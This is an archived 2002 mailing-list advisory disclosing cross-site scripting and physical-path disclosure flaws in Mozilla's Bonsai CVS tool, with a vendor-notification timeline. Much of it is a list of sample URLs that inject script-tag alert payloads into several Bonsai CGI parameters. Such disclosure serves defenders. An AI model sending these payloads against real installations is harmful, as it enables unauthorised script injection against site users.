Advisory: Bonsai XSS and Physical Path Revealing Vulnerabilities

From: Stan Bubrouski (stanat_private)
Date: Mon Aug 19 2002 - 16:20:20 PDT

Next message: GreyMagic Software: "RE: Exploiting the Google toolbar (GM#001-MC)"

Previous message: Ravish.: "Re: PHP-Nuke v5.6 - Users can compromise admin accts"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Author: Stan Bubrouski
Date: 19 August 2002
Product: Bonsai
Versions Affected: All(Current and CVS all vulnerable)
Severity: Cross Site Scripting is possible in several
places due to a lack of stripping of tags from input.
Some error messages also contain CSS and reveal the
physical path of the Bonsai scripts.

Problem:  We all know how CSS works, so I'll just
include some sample URLs to demonstrate the problem.

CSS Problems:
/webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert(document.domain)</script>
/webtools/bonsai/cvslog.cgi?file=<script>alert(document.domain)</script>
/webtools/bonsai/cvsblame.cgi?file=/index.html&root=<script>alert(document.domain)</script>
/webtools/bonsai/cvsblame.cgi?file=<script>alert(document.domain)</script>
/cvsquery.cgi?branch=<script>alert(document.domain)</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
/cvsquery.cgi?module=<script>alert(document.domain)</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
/showcheckins.cgi?person=<script>alert(document.domain)</script>
/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert(document.domain)</script>&branch=HEAD

Physical Path Revealing and CSS:
/bonsai/cvslog.cgi?file=/index.html&rev=<script>alert(document.domain)</script>&root=/cvsroot/

Physical Path Revealing only:
/bonsai/cvsview2.cgi
/bonsai/multidiff.cgi

As you can see there are many ways to display the
problems although many are related to error output
subroutines and just some subroutines in general
which do not properly filter input.  Something to
keep in mind if anyone out there is using Bonsai.
The physical paths are revealed in some instances
because of perl error messages (it appears) being
thrown directly onto the webpage thus revealing
physical paths.

Vendor Notification:
Notification of the vulnerability was sent to the
Mozilla team on August 5, 2002.  After recieving
no response on the matter, I sent another another
message on August 7th and I recieved a brief
response from someone the same day.  The problem
still exists on mozilla.org and no changes have
been made to Bonsai CVS to this very day.  The fix
seems simple, but I do not have a system to test
with so I cannot offer any solution.

Next message: GreyMagic Software: "RE: Exploiting the Google toolbar (GM#001-MC)"
Previous message: Ravish.: "Re: PHP-Nuke v5.6 - Users can compromise admin accts"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Aug 19 2002 - 16:57:44 PDT